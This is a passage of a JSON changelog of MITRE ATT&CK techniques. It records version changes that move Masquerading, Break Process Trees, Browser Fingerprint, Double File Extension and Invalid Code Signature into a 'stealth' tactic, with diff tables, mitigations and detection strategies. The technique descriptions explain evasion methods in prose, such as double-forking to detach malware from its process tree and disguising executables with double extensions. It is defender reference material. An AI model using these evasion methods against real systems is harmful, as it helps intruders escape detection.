class=\"diff_header\">></td><td nowrap=\"nowrap\">he&nbsp;Manufacturing&nbsp;industry&nbsp;with&nbsp;Lumma&nbsp;Stealer&nbsp;and&nbsp;Amadey&nbsp;Bot)</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;&nbsp;Adversaries&nbsp;may&nbsp;abuse&nbsp;these&nbsp;features&nbsp;for&nbsp;[<span class=\"diff_chg\">Defense&nbsp;Evasion</span>]</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;&nbsp;Adversaries&nbsp;may&nbsp;abuse&nbsp;these&nbsp;features&nbsp;for&nbsp;[<span class=\"diff_chg\">Stealth</span>](https:/</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">(https://attack.mitre.org/tactics/TA0005),&nbsp;specifically&nbsp;to&nbsp;p</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">/attack.mitre.org/tactics/TA0005),&nbsp;specifically&nbsp;to&nbsp;perform&nbsp;a</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">erform&nbsp;arbitrary&nbsp;execution&nbsp;while&nbsp;subverting&nbsp;detections&nbsp;and/o</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">rbitrary&nbsp;execution&nbsp;while&nbsp;subverting&nbsp;detections&nbsp;and/or&nbsp;mitiga</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">r&nbsp;mitigation&nbsp;controls&nbsp;(such&nbsp;as&nbsp;Group&nbsp;Policy)&nbsp;that&nbsp;limit/prev</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">tion&nbsp;controls&nbsp;(such&nbsp;as&nbsp;Group&nbsp;Policy)&nbsp;that&nbsp;limit/prevent&nbsp;the&nbsp;</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ent&nbsp;the&nbsp;usage&nbsp;of&nbsp;[cmd](https://attack.mitre.org/software/S01</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">usage&nbsp;of&nbsp;[cmd](https://attack.mitre.org/software/S0106)&nbsp;or&nbsp;f</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">06)&nbsp;or&nbsp;file&nbsp;extensions&nbsp;more&nbsp;commonly&nbsp;associated&nbsp;with&nbsp;malicio</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ile&nbsp;extensions&nbsp;more&nbsp;commonly&nbsp;associated&nbsp;with&nbsp;malicious&nbsp;paylo</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">us&nbsp;payloads.</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ads.</td></tr>\n        </tbody>\n    </table>",
                    "changelog_mitigations": {
                        "shared": [],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_datacomponent_detections": {
                        "shared": [],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_detectionstrategy_detections": {
                        "shared": [
                            "DET0200: Indirect Command Execution \u2013 Windows utility abuse behavior chain"
                        ],
                        "new": [],
                        "dropped": []
                    }
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--42e8de7b-37b2-4258-905a-6897815e58e0",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2017-05-31 21:30:38.511000+00:00",
                    "modified": "2026-04-15 20:32:00.311000+00:00",
                    "name": "Masquerading",
                    "description": "Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.\n\nRenaming abusable system utilities to evade security monitoring is also a form of [Masquerading](https://attack.mitre.org/techniques/T1036).(Citation: LOLBAS Main Site)",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "stealth"
                        }
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1036",
                            "external_id": "T1036"
                        },
                        {
                            "source_name": "LOLBAS Main Site",
                            "description": "LOLBAS. (n.d.). Living Off The Land Binaries and Scripts (and also Libraries). Retrieved February 10, 2020.",
                            "url": "https://lolbas-project.github.io/"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_contributors": [
                        "Bartosz Jerzman",
                        "David Lu, Tripwire",
                        "Elastic",
                        "Felipe Esp\u00f3sito, @Pr0teus",
                        "Menachem Goldstein",
                        "Nick Carr, Mandiant",
                        "Oleg Kolesnikov, Securonix"
                    ],
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_is_subtechnique": false,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Containers",
                        "ESXi",
                        "Linux",
                        "macOS",
                        "Windows"
                    ],
                    "x_mitre_version": "2.0",
                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['x_mitre_detection']\": \"\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-15 20:32:00.311000+00:00\", \"old_value\": \"2025-10-24 17:48:42.609000+00:00\"}, \"root['kill_chain_phases'][0]['phase_name']\": {\"new_value\": \"stealth\", \"old_value\": \"defense-evasion\"}, \"root['x_mitre_version']\": {\"new_value\": \"2.0\", \"old_value\": \"1.8\"}}, \"iterable_item_removed\": {\"root['external_references'][1]\": {\"source_name\": \"Twitter ItsReallyNick Masquerading Update\", \"description\": \"Carr, N.. (2018, October 25). Nick Carr Status Update Masquerading. Retrieved September 12, 2024.\", \"url\": \"https://x.com/ItsReallyNick/status/1055321652777619457\"}, \"root['external_references'][2]\": {\"source_name\": \"Elastic Masquerade Ball\", \"description\": \"Ewing, P. (2016, October 31). How to Hunt: The Masquerade Ball. Retrieved October 31, 2016.\", \"url\": \"https://www.elastic.co/blog/how-hunt-masquerade-ball\"}}}",
                    "previous_version": "1.8",
                    "version_change": "1.8 \u2192 2.0",
                    "changelog_mitigations": {
                        "shared": [
                            "M1017: User Training",
                            "M1018: User Account Management",
                            "M1022: Restrict File and Directory Permissions",
                            "M1038: Execution Prevention",
                            "M1040: Behavior Prevention on Endpoint",
                            "M1045: Code Signing",
                            "M1047: Audit",
                            "M1049: Antivirus/Antimalware"
                        ],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_datacomponent_detections": {
                        "shared": [],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_detectionstrategy_detections": {
                        "shared": [
                            "DET0127: Behavioral Detection of Masquerading Across Platforms via Metadata and Execution Discrepancy"
                        ],
                        "new": [],
                        "dropped": []
                    }
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--34a80bc4-80f2-46e6-94ff-f3265a4b657c",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2023-09-27 19:49:40.815000+00:00",
                    "modified": "2026-04-15 20:32:49.027000+00:00",
                    "name": "Break Process Trees",
                    "description": "An adversary may attempt to evade process tree-based analysis by modifying executed malware's parent process ID (PPID). If endpoint protection software leverages the \u201cparent-child\" relationship for detection, breaking this relationship could result in the adversary\u2019s behavior not being associated with previous process tree activity. On Unix-based systems breaking this process tree is common practice for administrators to execute software using scripts and programs.(Citation: 3OHA double-fork 2022) \n\nOn Linux systems, adversaries may execute a series of [Native API](https://attack.mitre.org/techniques/T1106) calls to alter malware's process tree. For example, adversaries can execute their payload without any arguments, call the `fork()` API call twice, then have the parent process exit. This creates a grandchild process with no parent process that is immediately adopted by the `init` system process (PID 1), which successfully disconnects the execution of the adversary's payload from its previous process tree.\n\nAnother example is using the \u201cdaemon\u201d syscall to detach from the current parent process and run in the background.(Citation: Sandfly BPFDoor 2022)(Citation: Microsoft XorDdos Linux Stealth 2022) ",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "stealth"
                        }
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1036/009",
                            "external_id": "T1036.009"
                        },
                        {
                            "source_name": "3OHA double-fork 2022",
                            "description": "Juan Tapiador. (2022, April 11). UNIX daemonization and the double fork. Retrieved September 29, 2023.",
                            "url": "https://0xjet.github.io/3OHA/2022/04/11/post.html"
                        },
                        {
                            "source_name": "Microsoft XorDdos Linux Stealth 2022",
                            "description": "Microsoft Threat Intelligence. (2022, May 19). Rise in XorDdos: A deeper look at the stealthy DDoS malware targeting Linux devices. Retrieved September 27, 2023.",
                            "url": "https://www.microsoft.com/en-us/security/blog/2022/05/19/rise-in-xorddos-a-deeper-look-at-the-stealthy-ddos-malware-targeting-linux-devices/"
                        },
                        {
                            "source_name": "Sandfly BPFDoor 2022",
                            "description": "The Sandfly Security Team. (2022, May 11). BPFDoor - An Evasive Linux Backdoor Technical Analysis. Retrieved September 29, 2023.",
                            "url": "https://sandflysecurity.com/blog/bpfdoor-an-evasive-linux-backdoor-technical-analysis/"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_contributors": [
                        "Tim (Wadhwa-)Brown"
                    ],
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_is_subtechnique": true,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Linux",
                        "macOS"
                    ],
                    "x_mitre_version": "2.0",
                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['x_mitre_detection']\": \"\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-15 20:32:49.027000+00:00\", \"old_value\": \"2025-04-15 21:54:02.243000+00:00\"}, \"root['kill_chain_phases'][0]['phase_name']\": {\"new_value\": \"stealth\", \"old_value\": \"defense-evasion\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}, \"root['x_mitre_version']\": {\"new_value\": \"2.0\", \"old_value\": \"1.0\"}}}",
                    "previous_version": "1.0",
                    "version_change": "1.0 \u2192 2.0",
                    "changelog_mitigations": {
                        "shared": [],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_datacomponent_detections": {
                        "shared": [],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_detectionstrategy_detections": {
                        "shared": [
                            "DET0443: Detection Strategy for Masquerading via Breaking Process Trees"
                        ],
                        "new": [],
                        "dropped": []
                    }
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--afac5dbc-4383-4fb6-9ba6-45b25d49e530",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2025-09-22 20:13:45.616000+00:00",
                    "modified": "2026-04-15 20:37:12.322000+00:00",
                    "name": "Browser Fingerprint",
                    "description": "Adversaries may attempt to blend in with legitimate traffic by spoofing browser and system attributes like operating system, system language, platform, user-agent string, resolution, time zone, etc.  The HTTP\u00a0User-Agent\u00a0request header\u00a0is a string that lets servers and network peers identify the application, operating system, vendor, and/or version of the requesting\u00a0user agent.(Citation: Mozilla User Agent)\n\nAdversaries may gather this information through [System Information Discovery](https://attack.mitre.org/techniques/T1082) or by users navigating to adversary-controlled websites, and then use that information to craft their web traffic to evade defenses.(Citation: Gummy Browsers Targeted Browser Spoofing against State-of-the-Art Fingerprinting Techniques)",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "stealth"
                        }
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1036/012",
                            "external_id": "T1036.012"
                        },
                        {
                            "source_name": "Mozilla User Agent",
                            "description": "MDN contributors. (2025, July 4). User-Agent header. Retrieved October 19, 2025.",
                            "url": "https://developer.mozilla.org/en-US/docs/Web/HTTP/Reference/Headers/User-Agent"
                        },
                        {
                            "source_name": "Gummy Browsers Targeted Browser Spoofing against State-of-the-Art Fingerprinting Techniques",
                            "description": "Zengrui Liu, Prakash Shrestha, and Nitesh Saxena. (2021, October 19). Retrieved April 15, 2026.",
                            "url": "https://arxiv.org/pdf/2110.10129"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_is_subtechnique": true,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Linux",
                        "macOS",
                        "Windows"
                    ],
                    "x_mitre_version": "2.0",
                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['x_mitre_detection']\": \"\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-15 20:37:12.322000+00:00\", \"old_value\": \"2025-10-19 19:41:22.343000+00:00\"}, \"root['description']\": {\"new_value\": \"Adversaries may attempt to blend in with legitimate traffic by spoofing browser and system attributes like operating system, system language, platform, user-agent string, resolution, time zone, etc.  The HTTP\\u00a0User-Agent\\u00a0request header\\u00a0is a string that lets servers and network peers identify the application, operating system, vendor, and/or version of the requesting\\u00a0user agent.(Citation: Mozilla User Agent)\\n\\nAdversaries may gather this information through [System Information Discovery](https://attack.mitre.org/techniques/T1082) or by users navigating to adversary-controlled websites, and then use that information to craft their web traffic to evade defenses.(Citation: Gummy Browsers Targeted Browser Spoofing against State-of-the-Art Fingerprinting Techniques)\", \"old_value\": \"Adversaries may attempt to blend in with legitimate traffic by spoofing browser and system attributes like operating system, system language, platform, user-agent string, resolution, time zone, etc.  The HTTP\\u00a0User-Agent\\u00a0request header\\u00a0is a string that lets servers and network peers identify the application, operating system, vendor, and/or version of the requesting\\u00a0user agent.(Citation: Mozilla User Agent)\\n\\nAdversaries may gather this information through [System Information Discovery](https://attack.mitre.org/techniques/T1082) or by users navigating to adversary-controlled websites, and then use that information to craft their web traffic to evade defenses.(Citation: Gummy Browsers: Targeted Browser Spoofing against State-of-the-Art Fingerprinting Techniques)\", \"diff\": \"--- \\n+++ \\n@@ -1,3 +1,3 @@\\n Adversaries may attempt to blend in with legitimate traffic by spoofing browser and system attributes like operating system, system language, platform, user-agent string, resolution, time zone, etc.  The HTTP\\u00a0User-Agent\\u00a0request header\\u00a0is a string that lets servers and network peers identify the application, operating system, vendor, and/or version of the requesting\\u00a0user agent.(Citation: Mozilla User Agent)\\n \\n-Adversaries may gather this information through [System Information Discovery](https://attack.mitre.org/techniques/T1082) or by users navigating to adversary-controlled websites, and then use that information to craft their web traffic to evade defenses.(Citation: Gummy Browsers: Targeted Browser Spoofing against State-of-the-Art Fingerprinting Techniques)\\n+Adversaries may gather this information through [System Information Discovery](https://attack.mitre.org/techniques/T1082) or by users navigating to adversary-controlled websites, and then use that information to craft their web traffic to evade defenses.(Citation: Gummy Browsers Targeted Browser Spoofing against State-of-the-Art Fingerprinting Techniques)\"}, \"root['kill_chain_phases'][0]['phase_name']\": {\"new_value\": \"stealth\", \"old_value\": \"defense-evasion\"}, \"root['external_references'][2]['source_name']\": {\"new_value\": \"Gummy Browsers Targeted Browser Spoofing against State-of-the-Art Fingerprinting Techniques\", \"old_value\": \"Gummy Browsers: Targeted Browser Spoofing against State-of-the-Art Fingerprinting Techniques\"}, \"root['external_references'][2]['description']\": {\"new_value\": \"Zengrui Liu, Prakash Shrestha, and Nitesh Saxena. (2021, October 19). Retrieved April 15, 2026.\", \"old_value\": \"Zengrui Liu, Prakash Shrestha, and Nitesh Saxena. (2021, October 19). Retrieved September 22, 2025.\"}, \"root['x_mitre_version']\": {\"new_value\": \"2.0\", \"old_value\": \"1.0\"}}}",
                    "previous_version": "1.0",
                    "version_change": "1.0 \u2192 2.0",
                    "description_change_table": "\n    <table class=\"diff\" id=\"difflib_chg_to9__top\"\n           cellspacing=\"0\" cellpadding=\"0\" rules=\"groups\" >\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <thead><tr><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">Old Description</th><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">New Description</th></tr></thead>\n        <tbody>\n            <tr><td class=\"diff_next\" id=\"difflib_chg_to9__0\"><a href=\"#difflib_chg_to9__top\">t</a></td><td class=\"diff_header\" id=\"from9_1\">1</td><td nowrap=\"nowrap\">Adversaries&nbsp;may&nbsp;attempt&nbsp;to&nbsp;blend&nbsp;in&nbsp;with&nbsp;legitimate&nbsp;traffic&nbsp;</td><td class=\"diff_next\"><a href=\"#difflib_chg_to9__top\">t</a></td><td class=\"diff_header\" id=\"to9_1\">1</td><td nowrap=\"nowrap\">Adversaries&nbsp;may&nbsp;attempt&nbsp;to&nbsp;blend&nbsp;in&nbsp;with&nbsp;legitimate&nbsp;traffic&nbsp;</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">by&nbsp;spoofing&nbsp;browser&nbsp;and&nbsp;system&nbsp;attributes&nbsp;like&nbsp;operating&nbsp;sys</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">by&nbsp;spoofing&nbsp;browser&nbsp;and&nbsp;system&nbsp;attributes&nbsp;like&nbsp;operating&nbsp;sys</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">tem,&nbsp;system&nbsp;language,&nbsp;platform,&nbsp;user-agent&nbsp;string,&nbsp;resolutio</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">tem,&nbsp;system&nbsp;language,&nbsp;platform,&nbsp;user-agent&nbsp;string,&nbsp;resolutio</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">n,&nbsp;time&nbsp;zone,&nbsp;etc.&nbsp;&nbsp;The&nbsp;HTTP\u00a0User-Agent\u00a0request&nbsp;header\u00a0is&nbsp;a&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">n,&nbsp;time&nbsp;zone,&nbsp;etc.&nbsp;&nbsp;The&nbsp;HTTP\u00a0User-Agent\u00a0request&nbsp;header\u00a0is&nbsp;a&nbsp;</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">string&nbsp;that&nbsp;lets&nbsp;servers&nbsp;and&nbsp;network&nbsp;peers&nbsp;identify&nbsp;the&nbsp;appl</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">string&nbsp;that&nbsp;lets&nbsp;servers&nbsp;and&nbsp;network&nbsp;peers&nbsp;identify&nbsp;the&nbsp;appl</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ication,&nbsp;operating&nbsp;system,&nbsp;vendor,&nbsp;and/or&nbsp;version&nbsp;of&nbsp;the&nbsp;req</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ication,&nbsp;operating&nbsp;system,&nbsp;vendor,&nbsp;and/or&nbsp;version&nbsp;of&nbsp;the&nbsp;req</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">uesting\u00a0user&nbsp;agent.(Citation:&nbsp;Mozilla&nbsp;User&nbsp;Agent)&nbsp;&nbsp;Adversari</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">uesting\u00a0user&nbsp;agent.(Citation:&nbsp;Mozilla&nbsp;User&nbsp;Agent)&nbsp;&nbsp;Adversari</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">es&nbsp;may&nbsp;gather&nbsp;this&nbsp;information&nbsp;through&nbsp;[System&nbsp;Information&nbsp;D</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">es&nbsp;may&nbsp;gather&nbsp;this&nbsp;information&nbsp;through&nbsp;[System&nbsp;Information&nbsp;D</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">iscovery](https://attack.mitre.org/techniques/T1082)&nbsp;or&nbsp;by&nbsp;u</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">iscovery](https://attack.mitre.org/techniques/T1082)&nbsp;or&nbsp;by&nbsp;u</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">sers&nbsp;navigating&nbsp;to&nbsp;adversary-controlled&nbsp;websites,&nbsp;and&nbsp;then&nbsp;u</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">sers&nbsp;navigating&nbsp;to&nbsp;adversary-controlled&nbsp;websites,&nbsp;and&nbsp;then&nbsp;u</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">se&nbsp;that&nbsp;information&nbsp;to&nbsp;craft&nbsp;their&nbsp;web&nbsp;traffic&nbsp;to&nbsp;evade&nbsp;defe</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">se&nbsp;that&nbsp;information&nbsp;to&nbsp;craft&nbsp;their&nbsp;web&nbsp;traffic&nbsp;to&nbsp;evade&nbsp;defe</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">nses.(Citation:&nbsp;Gummy&nbsp;Browsers<span class=\"diff_sub\">:</span>&nbsp;Targeted&nbsp;Browser&nbsp;Spoofing&nbsp;ag</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">nses.(Citation:&nbsp;Gummy&nbsp;Browsers&nbsp;Targeted&nbsp;Browser&nbsp;Spoofing&nbsp;aga</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ainst&nbsp;State-of-the-Art&nbsp;Fingerprinting&nbsp;Techniques)</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">inst&nbsp;State-of-the-Art&nbsp;Fingerprinting&nbsp;Techniques)</td></tr>\n        </tbody>\n    </table>",
                    "changelog_mitigations": {
                        "shared": [
                            "M1047: Audit"
                        ],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_datacomponent_detections": {
                        "shared": [],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_detectionstrategy_detections": {
                        "shared": [
                            "DET0898: Detection of Spoofed User-Agent"
                        ],
                        "new": [],
                        "dropped": []
                    }
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--11f29a39-0942-4d62-92b6-fe236cf3066e",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2021-08-04 20:54:03.066000+00:00",
                    "modified": "2026-04-15 20:33:07.592000+00:00",
                    "name": "Double File Extension",
                    "description": "Adversaries may abuse a double extension in the filename as a means of masquerading the true file type. A file name may include a secondary file type extension that may cause only the first extension to be displayed (ex: <code>File.txt.exe</code> may render in some views as just <code>File.txt</code>). However, the second extension is the true file type that determines how the file is opened and executed. The real file extension may be hidden by the operating system in the file browser (ex: explorer.exe), as well as in any software configured using or similar to the system\u2019s policies.(Citation: PCMag DoubleExtension)(Citation: SOCPrime DoubleExtension) \n\nAdversaries may abuse double extensions to attempt to conceal dangerous file types of payloads. A very common usage involves tricking a user into opening what they think is a benign file type but is actually executable code. Such files often pose as email attachments and allow an adversary to gain [Initial Access](https://attack.mitre.org/tactics/TA0001) into a user\u2019s system via [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001) then [User Execution](https://attack.mitre.org/techniques/T1204). For example, an executable file attachment named <code>Evil.txt.exe</code> may display as <code>Evil.txt</code> to a user. The user may then view it as a benign text file and open it, inadvertently executing the hidden malware.(Citation: SOCPrime DoubleExtension)\n\nCommon file types, such as text files (.txt, .doc, etc.) and image files (.jpg, .gif, etc.) are typically used as the first extension to appear benign. Executable extensions commonly regarded as dangerous, such as .exe, .lnk, .hta, and .scr, often appear as the second extension and true file type.",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "stealth"
                        }
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1036/007",
                            "external_id": "T1036.007"
                        },
                        {
                            "source_name": "SOCPrime DoubleExtension",
                            "description": "Eugene Tkachenko. (2020, May 1). Rule of the Week: Possible Malicious File Double Extension. Retrieved July 27, 2021.",
                            "url": "https://socprime.com/blog/rule-of-the-week-possible-malicious-file-double-extension/"
                        },
                        {
                            "source_name": "PCMag DoubleExtension",
                            "description": "PCMag. (n.d.). Encyclopedia: double extension. Retrieved August 4, 2021.",
                            "url": "https://www.pcmag.com/encyclopedia/term/double-extension"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_is_subtechnique": true,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Windows"
                    ],
                    "x_mitre_version": "2.0",
                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['x_mitre_detection']\": \"\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-15 20:33:07.592000+00:00\", \"old_value\": \"2025-10-24 17:48:25.732000+00:00\"}, \"root['kill_chain_phases'][0]['phase_name']\": {\"new_value\": \"stealth\", \"old_value\": \"defense-evasion\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}, \"root['x_mitre_version']\": {\"new_value\": \"2.0\", \"old_value\": \"1.0\"}}, \"iterable_item_removed\": {\"root['external_references'][3]\": {\"source_name\": \"Seqrite DoubleExtension\", \"description\": \"Seqrite. (n.d.). How to avoid dual attack and vulnerable files with double extension?. Retrieved July 27, 2021.\", \"url\": \"https://www.seqrite.com/blog/how-to-avoid-dual-attack-and-vulnerable-files-with-double-extension/\"}}}",
                    "previous_version": "1.0",
                    "version_change": "1.0 \u2192 2.0",
                    "changelog_mitigations": {
                        "shared": [
                            "M1017: User Training",
                            "M1028: Operating System Configuration"
                        ],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_datacomponent_detections": {
                        "shared": [],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_detectionstrategy_detections": {
                        "shared": [
                            "DET0366: Detection Strategy for Double File Extension Masquerading"
                        ],
                        "new": [],
                        "dropped": []
                    }
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--b4b7458f-81f2-4d38-84be-1c5ba0167a52",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2020-02-10 19:49:46.752000+00:00",
                    "modified": "2026-04-15 20:38:13.564000+00:00",
                    "name": "Invalid Code Signature",
                    "description": "Adversaries may attempt to mimic features of valid code signatures to increase the chance of deceiving a user, analyst, or tool. Code signing provides a level of authenticity on a binary from the developer and a guarantee that the binary has not been tampered with. Adversaries can copy the metadata and signature information from a signed program, then use it as a template for an unsigned program. Files with invalid code signatures will fail digital signature validation checks, but they may appear more legitimate to users and security tools may improperly handle these files.(Citation: Threatexpress MetaTwin 2017)\n\nUnlike [Code Signing](https://attack.mitre.org/techniques/T1553/002), this activity will not result in a valid signature.",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "stealth"
                        }
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1036/001",
                            "external_id": "T1036.001"
                        },
                        {
                            "source_name": "Threatexpress MetaTwin 2017",
                            "description": "Vest, J. (2017, October 9). Borrowing Microsoft MetaData and Signatures to Hide Binary Payloads. Retrieved September 10, 2019.",
                            "url": "https://threatexpress.com/blogs/2017/metatwin-borrowing-microsoft-metadata-and-digital-signatures-to-hide-binaries/"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_is_subtechnique": true,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
